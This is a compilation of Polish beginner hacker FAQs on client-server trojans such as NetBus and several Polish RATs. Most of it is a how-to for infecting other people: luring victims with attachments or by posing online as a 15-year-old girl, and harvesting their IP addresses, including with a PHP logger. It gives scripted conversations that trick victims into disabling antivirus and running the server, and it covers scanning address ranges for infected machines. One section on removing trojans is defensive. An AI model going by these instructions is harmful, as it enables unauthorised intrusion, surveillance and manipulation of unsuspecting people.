Trojan FAQ by -=ETER=-
Wszystkie informacje zawarte w tym FAQ sluza do celow edukacyjnych.Autor tego FAQ nie ponosi zadnej odpowiedzialnosci za wykorzystanie go w celach niezgodnych z prawem.Wszystko co robisz z tym tekstem robisz tylko i wylacznie na wlasna odpowiedzialosc!
SPIS TRESCI: _______________________________________
1.Wstepniak 2.Maly slownik:) 2.1.Co to jest wogole kon trojanski? 2.2.Co to jest IP? 2.3.Co to jest Telnet? 2.4.Co to jest Social Engineering? 2.5.Co to jest NAT? 3.Jak dzialaja trojany? 3.1.Klient 3.2.Serwer 3.3.Konfigurator serwera 4.Wybieramy trojana5.Zakladamy trojana 5.1.Sposoby podsylania serwera 5.2.Zdobywanie IP 5.2.1.IRC 5.2.2.GG 5.2.3.E-mail 5.2.4.Fizyczny dostep do kompa 5.2.5.PHP 6.Polskie trojany 6.1.Ccobra 1.1 6.2.Danton 4.3.1 6.3.Destruktor 2.0 6.4.PA HAC 1.6.1 Final Edition6.5.PaSzCzus 2.0-rc2 6.6.Ramirez 2.0 6.7.Wspomagacz:Reload 0.39 6.8.G@du-Ghost Trojan 1.4beta 7.Linki_________________________________
1.Wstep
Wiadomo ze kazdy haker musi od czegos zaczac.Poczatkujacy czesto wybieraja trojany, poniewaz jest to najprostsza z mozliwosci wlamu na czyis system. Jednak i tak czesto pojawiaja sie roznego rodzaju pytania dotyczaje trojanow. Chcac temu zaradzic postanowilem napisac ten FAQ.Tekst zawiera chyba wszystko cow eim o trojanach + maly slowniczek dla poczatkujacych.Gdyby ktos mial jakies zastrzezenia czy cos to prosze pisac: eter@poprostu.net Prosze o wyrazumialosc bo to jest moj pierwszy FAQ.Dziekuje:)
___________________________________
2.Maly slownik
Umiescilem tu kilka terminow ktore sa wykorzystane w tym FAQ(jesli jestes choc troche zaawansowany to nie czytaj tego)
2.1.Co to jest wogole kon trojanski?
Kon trojanski(potocznie nazywany trojanem) jest programem ktory najczesciej sklada sie z aplikacji klienta i serwera. Umozliwia on przejecie kontroli nad innym komputerem podlaczonym do sieci.
2.2.Co to jest IP?
IP(Internet Protocol) jest to 32-bitowa liczba zawierajaca informacje o tym do jakiej sieci nalezy twoj komputer oraz jednoznaczny aders w tej sieci. Kazdy komputer ma swoj przydzielony IP nie mogacy sie powtorzyc.
2.3.Co to jest Telnet?
Jest to protokol komunikacyjny wykorzystywany przez starsze trojany.Pozwala laczyc sie z jakims kompem na wybranym porcie takim poleceniem: telnet 127.0.0.1 47 Gdy wpiszesz tkaie cos polaczysz sie z samym saba na porcie 47. Sluzy on rowniez do wydawania polecen zdalnemu komputerowi podlaczonemu do sieci
2.4.Co to jest Social Engineering?
SocialEnerging(socjotechnika) jest to jedna z technik atakow hakerskich. Wymaga jednak duzo wiekszego wysilku niz inne techniki. Polega ona na podszywaniu sie pod inna osobe w rozmowie(osobistej jak i telefonicznej) w celu wyludzenia np. hasla. To w jaki sposob sie to zrobi uzaleznione jest tylko i wylacznie od wyobrazni hakera
2.5.Co to jest NAT?
NAT - (ang. Network Address Translation) - technika translacji adresów sieciowych. Wraz ze wzrostem ilości komputerów w Internecie, zaczęła zbliżać się groźba wyczerpania puli dostępnych adresów internetowych. Aby temu zaradzić, lokalne sieci komputerowe, korzystające z tzw. adresów prywatnych (specjalna pula adresów tylko dla sieci lokalnych), mogą zostać podłączone do Internetu przez jeden komputer (lub router), posiadający mniej adresów internetowych niż komputerów w tej sieci. - zrodlo: Wikpedia
___________________________________
3.Jak dzialaja trojany?
Prawie kazdy trojan sklada sie z klienta i serwera. Istnije tez aplikacje kozystajace z samego serwera, kontrolowane przez Telnet, ale zostaly one juz wyparte przez trojany wykorzystujacy GUI(Graficzny Interface Uzytkowinika).ZAjmiemy sie wlasnie nimi
3.1.Klient
Klientem haker wysyla polecenia serwerowi.To wlasnie nim kontrolujemy komputer
ofiary.Zazywaczaj posiada on takie pola: IP - tu trzeba wpisac numer IP ofiary Port - tu trzeba wpisac numer portu na ktorym ma sie polaczyc z ofiara, najlepiej jedna zostawic domyslny Po wypelnieniu pol i polaczeniu sie mozemy zaczynac ]
3.2.Serwer
Jest to aplikacja ktora wysylamy ofierze.Kiedy ofiara go uruchomi, trojan (najczesciej)automatycznie instaluje sie w katalogu systemowym i w rejestrze w kluczu: HKEY_LOCAL_MACHINE /Software/ Microsoft/ Windows/ CurrentVersion/ Run co powoduje jego uruchomienie zaraz przy starcie systemu.Serwer odbiera polecenie od klienta i wykonuje je.
3.3.Konfigurator serwera
Czasami do trojana jest tez dolaczony konfigurator serwera. Mozemy nim stworzyc lub zmienic juz instniejacy serwer o np. nazwe, ikone, rozmiar itp.
_______________________________
4.Wybieramy trojana
Zanim zacniemy cokolwiek robic musimy wybrac trojana. Powiniem byc on latwy w obsludze i spelniac wszystkie nasze wymogi.Kazdy dobry trojan posiada takie funkcje jak:
· · otwieranie i zamykanie CD-ROMu
· zamykanie, restartowanie i logowanie z Windy
· wlaczanie i wylaczanie monitora
· zawieszanie myszki, klawiatury i systemu
· wbudowany keylogger
· odsluge e-maili i kilka innych.Ja osobiscie uzywam Wspomagacza:Reload. Polecam, jest to bardzo dobry trojan, dzialajacy poza NATem. To jakiego trojana wybierzesz zalezy juz od Ciebie. Moze cos z ponizej wypisanych trojanow
___________________________________
5.Zakladamy trojana
Zanim zaczniemy dzilac musimy najpierw ofierze wyslac serwer i zdobyc jej adres IP. Jak to zrobic opisze ponizej.
5.1.Sposoby podsylania serwera
Tutaj masz szerokie pole do popisu, możesz podeslac ofierze maila z zalacznikiem lub uzyc Social Engineeringu i na kanale IRCa podac sie za seksowna 15latke i wyslac ofierze (niby)zdjecie. Jesli znasz ofiare osobiscie mozesz do niej pojsc do niej i jak pojdzie do kibla to zainstalujesz serwer.Wszystko zalezy od Ciebie
5.2.Zdobywanie IP
No wiec istnieje kilka sposobow, podam tu kilka najpopularniejszych: 5.2.1.IRC Wpisujesz "/dns nick ofiary" oczywiscie bez cudzyslowia i juz 5.2.2.GG Poczekaj az ofiara wpisze Cie do listy kontaktow, wchodzisz tylko do Inwigilatora(najpierw doinstaluj pakiet PowerGG) i masz IP! 5.2.3.E-mail Popros ofiare aby wyslala Ci jaki list czy cos na maila. Potem wchodzisz do OE, zaznaczasz odebrana wiadomosc i wciskasz CTRL+F3. Pokaze Ci sie okienko, odszukujesz kawalek X-Trace i w tej linii znajdziesz IP ofiary.UWAGA! E-mail musi również być wysłany z OE! 5.2.4.Fizyczny dostep do kompa Jesli masz fizyczny dostep do kompa to jest to duzo latwiejsze. Jesli ofiara ma Windows z serii 9x to wejdz w StartUruchom i wpisz winipcfg. Jesli ma NT to wpisz ipconfig.Potem wystarczy tylko spisac IP na jakas kartke. 5.2.5.PHP Zaloz sobie konto FTP z obsluga PHP i wklej tam plik o nazwie np. ipeki.php o takiej zawartosci:
[?php
$fp=fopen("numeryip.txt", "a");
flock($fp, 2);
fwrite($fp, $_SERVER['REMOTE_ADDR']);
flock($fp, 3);
fclose($fp);
?]
(nawiasy: pierwszy i ostatni [] nazely zmienic na 'ostry' )
Spowoduje to ze IP kazdej osoby odwiedzajacej strone bedzie zapisywane do pliku numeryip.txt
__________________________________
6.Polskie trojany
Nie musisz korzystac z zagranicznych trojanow bez polskiej werski jezykowej:/.Polscy programisci napisali wiele trojanow nadajacych sie do uzytku mn. legendarnego Prosiaka.Ponieżej podaje informacje o popularniejszych trojanach made in Poland w kolejnosci alfabateycznej
6.1.Ccobra 1.1 Plik serwera: gg6.1.exe Plik klienta: Ccobra.exe Plik konfiguracji serwera: nie posiada Port: 2024,2025 System: Win 98/Me/2000 Autor: Ccobra Strona domowa: http://www.ccobra.boo.pl/ E-mail autora: netstat1@op.pl NAT: Nie dziala
6.2.Danton 4.3.1 Plik serwera: DantonS 4.3.0. alpha Plik klienta: Danton 4.3.0 Plik konfiguracji serwera: Danton SEditor Port: 6969 System: Windows 95/98/NT/ME/2000/XP/2003 Autor: Lol_ek Strona domowa: http://www.danton.prv.pl/ E-mail autora: dantonzone@poczta.onet.pl NAT: Nie dziala
6.3.Destruktor 2.0 Plik serwera: game.exe Plik klienta: Destruktor_2_0 Plik konfiguracji serwera: Destruktor_2_0 (w kliencie) Port: 6969 System: Windows 95/98/NT/ME/2000/XP/2003 Autor: Destruktor Strona domowa: http://www.destruktor.to.pl/ E-mail autora: destruktor76@wp.pl NAT: Dziala
6.4.PA HAC 1.6.1 Final Edition Plik serwera: pa.exe Plik klienta: PA HAC.exe Plik konfiguracji serwera: --- Port: ? System: Windows 95/98/NT/ME/2000/XP/2003 Autor: PA HAC Strona domowa: http://www.pahac.webpark.pl E-mail autora: pahac@wp.plNAT: Nie dziala
6.5.Ramirez 2.0 Plik serwera: scanlog.exe Plik klienta: Ramirez.exe Plik konfiguracji serwera: --- Port: 2323 System: Windows 98Autor: Black Ice Team Strona domowa: www.blackice.crack.pl E-mail autora: blackice@marihuana.com NAT: Nie dziala
6.6.Wspomagacz: Reload 0.39 Plik serwera: Server.exe Plik klienta: Klient.exe Plik konfiguracji serwera: Konfigurator.exe Port: Server Gadu-Gadu System: Windows 95/98/NT/ME/2000/XP/2003 Autor: Wspomagacz Strona domowa: www.wspomagacz.prv.plE-mail autora: wspomagacz@xlarge.at NAT: Dziala
6.7.G@du-Ghost Trojan 1.4beta
Polecam jeszcze G@du-Ghost Trojan.Jest to dosc nietypowy trojan.W chwili pisania tego FAQ najnowsza wersja to 1.4 beta. GGT kontrolujemy za pomoca normalnego Gadu-Gadu. Wyglada to dokladnie tak jak zwyczajna rozmowa na GG.Potrzebne sa 2 numery, jeden dla serwera a drugi dla Ciebie, poniewaz polecenia wysylamy za pomoca komunikatora.Posiada w sobie generator
serwerow.
Plik konfiguracji serwera: G@du Ghost Trojan v1.4 beta System: Windows Autor:Wojtass Strona domowa: http://www.ggt.int.pl E-mail autora: wojass@ggt.hackpl.info
___________________________________
7.Linki: http://www.haker.com.pl/ - Największy zbior informacji o trojanach + super forum http://www.trojanyPL.prv.pl - Kolejny duży zbiór informacji o wszystkich polskich
trojanach http://www.software.xt.pl/ - Rowniez stronka o trojanach http://cc-team.org - Swietna stronka grupy Cyber-Crime poswiecona hackingowi
Autor: -=ETER=-
Trojany - podstawy ogólne
Trojan jest:
-Nieupowaznionym programem znajdujacym sie w innym "legalnym" programie. Ten nieupowazniony program spelnia wiele funkcji nie znanych (i pewnie tez niepozadanych) przez uzytkownika.
-Zwykly program, ktory zostal zmieniony poprzez wstawienie miedzy jego linijki nichcianego kodu; wlasnie ten kawalek kodu spelnia nie znane uzytkownikowi funkcje.
-Kazdy program posiadajacy pozadane i niezbedne funkcje, wykonuje inne czynosci bez wiedzy uzytkownika (dzieki wprowadzonemu kodu trojana do kodu tego programu).
Trojany sa takze nazywane skrotem RAT (od Remote Administration Tools-narzedzia zdalnej administracji).
Nazwa "trojan" pochodzi od starej opowiesci o tym jak Grecy podczas wojny, "podzucili" podstepem ogromnego drewnianego konia, jako prezent.
Oczywiscie prezent zostal przyjety i wniesiony do krolestwa... W nocy, greccy zolnieze , ktorzy ukryli sie w koniu, wypelzneli z kryjowki i zaatakowali miasto, pokonujac wroga.
No wiec wiesz juz czym jest trojan. Trojan sklada sie z programu klienta i programu serwera. Jesli chcesz przejac kontrole nad czyims kompem powinienes na nim uruchomic program serwera. Potem powinienes polaczyc sie z tak utowzonym "serwerem" na jego kompie za pomoca programu klienta, wpisujac w odpowiednie miejsce numer IP ofiary.
*UWAGA
Jesli chcesz poznac czyjes IP za pomoca ICQ po prostu zobacz na info danej osoby.
Jak kolo siedzi na IRCu, napisz /dns nick (gdzie "nick" to nick kolesia ktorego IP chcesz poznac
**********************************
Wiekszosc nowych trojanow posiada opcje, dzieki ktorym zostaniesz powiadomiony e-mailem o tym, ze ofirara uruchomila serwer (zarazony plik) na swoim kompie. Otrzymasz tez numer IP ofiary oraz inne informacje. Oczywiscie mozesz zdefiniowac adres e-mailowy na ktory maja byc przysylane te informacje.
Teraz powinienes namowic ofiare do uruchomienia serwera, mozesz powiedziec, ze to jakis ciekawy programik albo cokolwiek innego, wymysl cos!
Gdy masz juz IP ofiary wpisz go w odpowiednim miejscu w kliencie, nastepnie kliknij button "Connect". Teraz mozesz zrobic co tylko zechcesz z komputerem pechowca, ogranicza Cie tylko ilosc opcji jakie posiada trojan, ktorego uzyles.
Kazdy trojan ma swoj wlasny zestaw opcji. Prawie kazdy nowszy trojan pozwala na manipulowanie plikami na kompie ofiary. Uzytkownik moze przegladac/kasowac/przenosic/wysylac/sciagac/uruchamiac pliki na cudzej maszynie,
Ta zdolnosc trojanow jest bardzo niebezpieczna. Pozwala ona uzytkownikowi na wyslanie do naszego kompa virusow czy innego badziewia oraz na URUCHOMIENIE ich (oczywiscie jesli jestes ofiara).
Trojany maja wiele wiecej niebezpiecznych opcji. Uruchamia sie je odpowiednim przyciskiem za pomoca ktorego mozna przykladowo sformatowac dysk twardy ofiary. Inna niebezpieczna funkcja to mozliwosc uruchomienia serwera FTP na dysku ofiary i otworzenia portow co pozwoli wszystkim innym uzytkownikom sieci na sciaganie/wgrywanie/uruchamianie plikow z kompa ofiary.
Wiekszosc nowych trojanow ma mozliwosc przechwycenia listy twoich hasel z pamieci chache.
Posiadaja tez mniej zlosliwe opcje, takie jak ukrycie wskaznika myszy, przejecie kontroli nad myszka, restart windozy, wejscie na podana strone, wyswietlenie rysunku, roznego rodzaju floody itp. Nie sa one szkodliwe, ale dla nie ktorych moga byc troche denerwujace
, ktos moze sie nawet przestraszyc nie wiedzac co sie dzieje :>/--/--//--/--//--/--//--/--//--/--//--/--//--/--//--/--//--/--//--/--//--/--//--/--//-
Teraz powiem Ci jak dzialaja trojany
Uruchomienie zarazonego pliku powoduje otworzenie specyficznego portu i nasluchiwanie na polaczenie z zewnatrz. Trojan moze uzywac protokolu TCP lub UPD.
Jesli juz polaczysz sie z IP ofiary mozesz robic z jego kompem co tylko zechcesz, pozwala Ci na to serwer ktory ofiara uruchomila na swoim kompie.
When you connect with the victim IP the you can do what you want because the server let you do
the trojan functions on the infected computer. Coraz wiecej trojanow uruchamia sie ponownie przy kazdym restarcie windy lub wylaczeniu kompa.
Modyfikuja pliki win.ini lub system.ini, dzieki czemu trojan moze sie uruchamiac po kazdym zaladowaniu windy, wiekszosc trojanow modyfikuje jednak rejestr aby uzyskac ten efekt.
Niekture trojany maja unikalne opcje takie jak zdobycie czyjegos ICQ UIN, dodanie siebie do ksiazki adresowej ofiary, szpieg ICQ, ktory pozwala podgladnac wiadomosci jakie ofiara wysyla za pomoca ICQ.
Jak juz wspominalem trojan to bardzo niebezpieczna zabawka. Ktos moze dowiedziec sie wielu zeczy o Tobie. A chyba nie chcialbys zeby jakies Twoja prywatnosc byla publikowana w ogulnodostepnym internecie.
Kazdego dnia tworzone sa coraz to nowe trojany zawieraja nowe opcje, sa trudniejsze
do wykrycia przez programy antywirusowe. Nikt nie wie ile w necie znajduje sie trojanow. Mimo to programiscie nadal je pisza, i chyba beda to robic nadal.
Z technicznego punktu widzenia trojan moze znajdowac sie wszedzie, w kazdym systemie operacyjnym, w kazdym programie, na kazdej platformie.
Rozpowszechnainie sie trojanow wyglada podobnie jak jest to z wirusami. Programy sciagane z netu, przede wszystkim wersje shareware i freeware sa zawsze podejazne.
Podobnie jest z materialami sciganymi z underground'owych serwerow czy tez grup dyskusynych. Sa setki nie sprawdzonych programow pojawiajacych sie kazdego dnia, kazdy z nich moze byc trojanem.
Uwazaj co sciagasz i zkad sciagasz! I nie zapomnij o sprawdzaniu podejzanych plikow antyvirem.
Usuwanie trojanów,
backdoorów, spywarów.
Wstęp.
.................................................Aby usunąc wirusa , który nie jest usuwalny przy pomocy programu antywirusowego należy znać dokładnie nazwę pliku oraz nazwę wirusa. Jeżeli znamy wyłącznie nazwę pliku i jesteśmy pewni , że jest to wirus to również mamy szansę na jego całkowite i skuteczne usunięcie.
Najczęsciej źródłem informacji tej będzie program antywirusowy, żadziej nasza "intuicja" poparta badaniem systemu opisanego wcześniej w dziale "Wykrywanie backdoorów, trojanów i spywarów".
Znając nazwę pliku (bardzo musi być dokładna i z rozszerzeniem) oraz często nazwę wirusa i umiejscowienie pliku usuniemy tego szkodnika łącznie z innymi wpisami które zrobił.
Usuwanie wirusa.
...................................................................Znając nazwę pliku a nie znając jego umiejscowienia należy go odszukać,klikamy:
Start > Znajdź > Pliki lub foldery
Wpisujemy pełną i dokładną nazwę wirusa łącznie z rozszeżeniem pliku i następnie klikamy
Znajdź
W ustawieniach musi być ustawione szukanie :
"szukaj w" > mój komputer
Po jakimś czasie jak szukanie dobiegnie końca (ok. 1 do 2 minut) w oknie powinna pojawić się nazwa pliku i w następnym wierszu jego lokalizacja w postaci ścieżki dostępu.
Bezpośrednio można klikając na plik w oknie szukarki prawym klawiszem myszy i wybierając z rozwiniętego menu kontekstowego "Usuń" wyrzucić szkodliwy plik, lecz przeważnie okazuje się, że plik nie daje się usunąc (wyświetla się jakiś komunikat, np.że plik jest zajęty, albo że brak uprawnień itp.
Wówczas należy sprawdzić w oknie aktywnych programów czy plik nie jest aktywny i nie jest uruchomiony jako pracujący program, wciskamy aby to sprawdzić:
Ctrl + Alt + Delete
W oknie "Zamykanie programów" szukamy wersza z nazwą naszego szkodliwego pliku, i jak znajdziemy to go zaznaczamy (za pomocą myszy lub nakierowując kursorami zaznaczenie) i następnie klikamy na przycisk "Zakończ zadanie".Jeżeli nie znajdziemy w tym oknie naszego uciążliwego pliku należy użyć jakiegoś edytora procesów , np. choćby darmowego ProcessViewer.
Postępujemy identycznie, czyli dokonujemy zakończenia procesu o nazwie takiej jaką ma szkodliwy plik (lub pliki).Po zamknięciu procesu (zabiciu procesu) plik powinien się dać już usunąć.
Jeżeli jeszcze nie daje się ten plik usunąć to należy sprawdzić jego atrybuty (czy nie jest jako systemowy albo tylko do odczytu )i ewentualnie ustawić te atrybuty pliku tak by można było usunąc.
Czasem nawet to nie pomaga ponieważ zmienione wpisy w rejestrach skonfigurowały tak system aby utrudnić jego usunięcie. Tak czy owak należy zawsze usunąć wpisy dokonane przez wirusa z rejestru o czym piszę poniżej.
Plik wirusa należy bezwzględnie usunac bo on jest głównym zagrożeniem dla systemu..................................................................Usunięcie pliku nie jest jeszcze zakończeniem operacji usuwania wirusa, często się zdarza, że wirus dokonuje wpisów w rejestrach systemowych.
Aby usunąć wpis rejestru który został dokonany za pomocą wirusa najprościej będzie użyć programu Hijack This.Po uruchomieniu programu Hijack This klikamy na guzik:
Scan
Po krótkiej chwili wyświetli się lista wpisów programów działających z autostartu. Należy ją przeglądnąci odszukać wpis w którym jest nazwa pliku wirusa (wpisów może być nawet kilka), przeważnie jest też podana ścieżka dostępu do pliku co upewni nas , że zaznaczamy wpis dotyczący wirusa, po zaznaczeniu kwadracika na początku wiersza w którym występuje nazwa pliku wirusa klikamy na :
Fix checked
i zostaje wpis ten (wpisy) usunięty. Usunięcie nie oznacza całkowitego usunięcia , gdyż program ten zapisuje w archiwum usuwane wpisy i dzięki temu w razie usunięcia użytecznego wpisu można łatwo go przywrócić klikając :
Config... > Backups
wyszukując wpis usunięty (jest tam podana data i godzina usunięcia), zaznaczając go i klikając na :
Restore
Po użyciu programu Hijack This z rejestru usuniemy w prosty sposób wpisy pozostawione przez różnego rodzaju wirusy i spywary (również możemy się pozbyć niechcianych stron startowych w przeglądarce internetowej).
Jeżeli nie dysponujemy programem Hijack This, czy też wolimy usunąć ręcznie wpis z rejestru całą operację wykonać można w edytorze rejestru.
Uruchamiamy edytor rejestru :
Start > Uruchom W oknie wiersza poleceń programu "Uruchom"
wpisjemy:
regedit
i następnie klikamy na OK
W ten sposób uruchamiamy edytor rejestru, w którym najpierw wykonujemy kopię aktualnego rejestru (w razie komplikacji mzna oryginalny, aktualny rejestr przywrócić) klikając na :
Rejestr > Eksportuj plik Rejestru
otworzy się wówczas okno edksploratora windows, gdzie wpiszemy nazwę (tutaj można np. wpisać w postaci daty) i klikamy na:
Zapisz
Następnym krokiem będzie odszukanie niepotrzebnego, szkodliwego wpisu (wpisów) który dokonał wirus w naszym rejestrze, klikamy na :
Edycja > Znajdź
W okienko tekstowe "Znajdź" wpisujemy dokładną nazwę pliku wirusa i klikamy na:
Znajdź następny
Po jakimś czasie powinien wyświetlić się wpis w rejestrze, który został dokonany przez wirusa (będzie podświetlony na zielono), usuwamy cały wpis najeżdżając kursorem myszy na zaznaczony wpis i klikjąc prawym klawiszem myszy, z rozwiniętego menu kontekstowego wybieramy Usuń, wyświetli się okno pytające o potwierdzenie usunięcia wpisu, potwierdzamy co w trezultacie doprowadzi do usunięcia niechcianego wpisu.
w celu sprawdzenia czy nie ma jeszcze więcej wpisów zrobionych przez wirusa znowu klikamy na:
Edycja > Znajdź następne
i powtarzamy całą operację jak powyżej do czasu aż wyświetli się komunikat:
Wyszukiwanie w rejestrze zakończone
Jeżeli wcześniej nie udało się usunąć pliku wirusa to teraz powinno to się udać. Usuwamy zatem plik wirusa.
Po restarcie komputera nie powinno już być trojana ani po nim żadnych, negatywnych śladów.
Podsumowanie
....................................................................W ten sposób można usunąć ok. 96% szkodliwych programów (backdoorów, trojanów, spywarów itp.). Czasem zdarza się, że wirusy zmieniają wpisy lub dodają własne wpisy w plikach wsadowych systemu, ale jest to na razie rzadka praktyka. Również bywa, że pliki mają postać wielokrotnie skompresowanych archiwów, archiwów zdolnych do kopiowania się w inne miejsce na dysku, maskowania czasem nawet procesów i upodabniania nazw plików i procesów do występujących w systemie. Sposobu na usuwanie tego typu szkodliwych programów nie ma sensu opisywania ponieważ wymagana jest do tego większa wiedza i znajomość budowy systemu operacyjnego, osoba dysponująca taką zaś wiedzą bez trudu sama znajdzie metodę pozbycia się wirusa. Na szczęscie ilość tak wyrafinowanych wirusów jest na razie znikoma i mało prawdopodobne jest abyś Ty drogi czytelniku zaraził swój system takim programem.
FAQ O TROJANACH TYPU KLIENT - SERWER
Spis tresci
Wszelkie materialy zamiescilem po to zeby pokazac co to sa trojany typu klient-serwer. Jezeli przestrzegasz prawo to skasuj ten plik bo sobie klopotow narobisz synu !!!
A i jest to faq dla naprawde poczatkujacych!
1. Co to trojan 
2. Co to jest trojan klient-serwer??? 3. Do czego sluzy plik serwer a do czego klient??? 4. No dobra ja chce trojana! 5. Sciagnelem sobie trojana o nazwie xxx (niech bedzie ze netbus) 6. No dobra ale ja nie wiem co zrobic. 7. Jak zdobyc nazwe kompa??? 8. Jak zdobyc IP
A. IRC 1. Na totalnego lamucha 2. Na lamucha ostroznego (ma antywira) B. Skanery
9. Mam Ip no i on ma zainstalowanego serwera co dalej 10. Co do czego sluzy (w netbusie) 11. Bardzo wazne 12. Podziekowania
1. Co to trojan
Trojan jest to programik ktory podaje sie za ciekawy program a tak naprawde taki fajny to on nie jest (przynajmniej dla osoby ktora go uruchomila) Ja zajme sie opisywaniem trojanow klient-serwer czemu??? poniewaz tylko takimi sie interesuje. Bede tu opisywal tylko trojany pod windowsa.
2. Co to jest trojan klient-serwer???
Jest to trojan ktory sklada sie z dwoch plikow: trojana i serwera. Moze miec on takze plik config.exe ktory sluzy do konfigurowania serwera.
3. Do czego sluzy plik serwer a do czego klient???
Serwer - to plik ktory dajemy jakies osobie. Ona go uruchamia a serwer instaluje sie na dysku i w rejestrach (zeby po ponownym uruchomieniu kompa znow mozna bylo korzystac) i uruchamia nam dany port, ktory w wiekszosci trojanow mozemy okreslic, albo pozostawic standardowy. np. Netbus ma port
4. No dobra ja chce trojana!
Najlepiej wejsc na strone www.haker.com.pl sa tam trojany wszelkiej masci. Niestety czesc z nich za darmo dostepna nie jest ale na poczatek mozna sie bawic trojanami tam dostepnymi
5. Sciagnelem sobie trojana o nazwie xxx (niech bedzie ze netbus)
No i on jest spakowany wiec sobie go najlepiej rozpakowac (WinZip) do katalogu netbus. Mamy 2 pliki exe reszta niewazna. Jeden nazywa sie netbus.exe (klient), a drugi patch.exe (serwer). Jak juz wczesniej mowilem lepiej nie uruchamiac serwera bo gdy wejdziemy na net do mozemy trafic na jakiegos maniaka ktory sformatuje dysk!
6. No dobra ale ja nie wiem co zrobic.
Hm... na poczatku pojawia sie nam okno glowne netbusa mamy tam duzo opcji. Ale nas narazie interesuje okienko Host name/IP. Musimy tam wpisac albo nazwe kompa (LAN) albo IP (Internet i LAN).
7. Jak zdobyc nazwe kompa???
Wystarczy wejsc na otoczenie sieciowe i przepisac nazwy komputera albo w trybie msdos wpisujemy netstat -a i w kolumnie obcy adres bedzie spis kompow ktore sa aktualnie podlaczone do naszego.
8. Jak zdobyc IP
Tu juz bedzie troche trudniej ale znowu nie tak bardzo. Jest kilka sposobow np. IRC, Skanery IP...
A. IRC
No tu najlepiej wpisac komende /whois xxx (gdzie xxx to nick jakim gosc sie posluguje). Powinno pojawic sie takie cos: . Wtedy znowu msdos i piszemy ping pc102.bydgoszcz.cvx.ppp.tpnet.pl. Pojawi sie: Badanie pc102.bydgoszcz.cvx.ppp.tpnet.pl [127.0.0.1]... cos tam dalej bedzie nas interesuje tylko ten numer w nawiasie bo to numer IP )) Wtedy podrzucamy gosciowi pliki zagadujac ze to jakis patch do windowsa i powinien uruchomic.
Jak go zagadac to zalezy od jego IQ. Dam tu dwa sposoby na wkopanie kolesia:
1. Na totalnego lamucha
ja- cze on- cze ja -qurfa mam pecha on- czemu? ja- sciagalem program a on nie dziala on- jaki ja- zeby mozna bylo zdobywac hasla do skrzynek pocztowych (jakis bajer cza wcisnac) on- ja -no piszesz np. marek@wp.pl a on ci mowi jakie koles ma haslo (jak lamuch to pomysli ze to prawda) on- daj sprawdze ja -nie wiem czy ci powiniennem go dawac on -oj przeciez nic nie zrobie ja- no dobra ale nikomu nie dawaj on- ok ja- no i co on- faktycznie nie dziala ja -trudno, co tam slychac...
I gadka trwa a my w tym czasie bawimy sie ale jak to przeczytacie dalej.
2. Na lamucha ostroznego (ma antywira)
ja- slyszales o JFSDPN.1871 (nazwa dowolna) on- a co to? ja- nowy vir on- co robi? ja- niszczy partycje i master boot recorda on- qurfa ja- naszczescie tylko 11,12,13 dnia kazdego miesiaca on- qurfa jutro jest 11 ja -no wlasnie on- masz go ja- mialem ale go usunelem programem AntiJFSDPN ja- przesle ci wirusa spakowanego zipem i sprawdz czy ci go antywir wykryje on ok Wysylamy mu plik ktory nie jest wirusem jakis co jakgo z edytuje to bedzie widzial same dziwne znaki jakiegos o rozszerzeniu .dll on -nie wykryl ja- a odbierales poczte dzis on- no ja- mogles go dostac w zalaczniku on- no ale ja nie dostawalem zalacznikow ja- oj stary on jest tak zrobiony ze w OutlookExpresie zalacznika nie widac a jak bedziesz czytal posta to i tak sie uruchomi. Rozmnaza sie w express tempie on- hm... (koles zaczyna podejrzewac) ja- nie to nie zmuszac cie nie bede ale uwazaj jutro, dobrze ci radze on -albo daj mi odtrutke! ja -zmadrzales on- ja- masz zainstalowanego Ciotex AntiVirusa??? (nazwa dowolna tylko zeby jej na 100% nie mial!) on -nie mks_vira ja -mksa hahaha stary to ja ci sie nie dziwie ze ci nie wykryl on -czemu ja- oj stary to jest program ktory gdy tylko zobaczy jakas sygnature wirusa od- razu wola na alarm (waly wciskamy, waly bezsensu) on- nie rozumiem ja -dobra nie bede ci macil on- mow mow tylko spokojnie i powoli ja- jezeli uruchomisz tego antywirusa mks bedzie myslal ze to jest wirus bo bedzie probowal odczytac dane z mbra i przez to podniesie alarm (kit kit kit) on- no dobra na ten czas zamkne ja- no wlasnie teraz zamkniesz sprawdzisz i znowu wlaczysz on- ok Wysylamy on uruchamia laczymy i szybko kasujemy mks_vir.exe z katalogu najczesciej program files (jak to zrobic pisze pozniej) ja- wykryl? on- nie dziala ja jak ci sie nic nie wlaczylo to znaczy ze nie masz on -:)))
B. Skanery
Najlepiej sobie sciagnac takiego skanera np. Trojan Hunter i zaznaczyc ip do skanowania z rozsadna granica. Np. ludzie z telekomunikacji korzystaja z numerow 213.76.X.X (gdzie X to dowolna liczba z przedzialu od 0 do 255). Wiec wlaczamy Trojan Huntera i dajemy granice od 213.76.1.1 do 213.76.30.255 Najlepiej zaznaczyc tylko te trojany ktore posiadacie.
9. Mam Ip no i on ma zainstalowanego serwera co dalej
Dalej to juz latwo... Wpisujesz IP albo nazwe kompa i klikasz na connect. Na dole powinno byc napisane ze jestes polaczony. Jezeli tak nie jest to sprawdz czy poprawnie wpisales IP albo nazwe kompa. Jezeli wpisales dobrze a nie dziala to znaczy ze koles albo nie uruchomil, albo jest cos nie tak z polaczeniem.
10. Co do czego sluzy (w netbusie)
Server admin - mozemy tu server zamknac tymczasowo (close server) lub na zawsze (remove server)
open cdrom - wysuwa/zamyka klapke cd (nie radze stosowac bo do wizytowka kazdego trojana)
show image - pokazuje obrazek z rozszerzeniem *.jpg, *.bmp (musi byc na jego hdd)
swap mouse - zmienia lewy na prawy i prawy na lewy przycisk myszy (denerwujace koles moze z reebotowac myslac ze to usterka windowsa)
start progaram - uruchamia program na jego komputerze (musi byc na jego hdd)
msg manager - pokazuje na jego kompie wiadomosc ktora mu wpiszemy, type to rodzaj komunikatu (blad, ostrzezenie,...) a buttons to przyciski do wyboru (ok, cancel,...). Jezeli zaznaczymy "let the user answer the message" koles bedzie nam mogl odpowiedziec
screendump - robi zrzut ekranu dzieki czemu mozemy zobaczyc co obecnie koles majstruje przy kompie
get info - info o kopmie np. ile osob jest aktualnie podlaczonych do kolesia, gdzie ma zainstalowanedo servera...
port redirect - to dla zaawansowanych. Chodzi tu o tunelowanie jakiegos ip. Tzn. ze jezeli cos robimy to z nie naszego tylko cudzego ip czyli mozemy robic co chcemy bo i tak nie pojdzie na nas (wiecej o tunelowaniu znajdziecie w faq _PTM_ dostepnym pod adresem www.haker.com.pl/Teksty
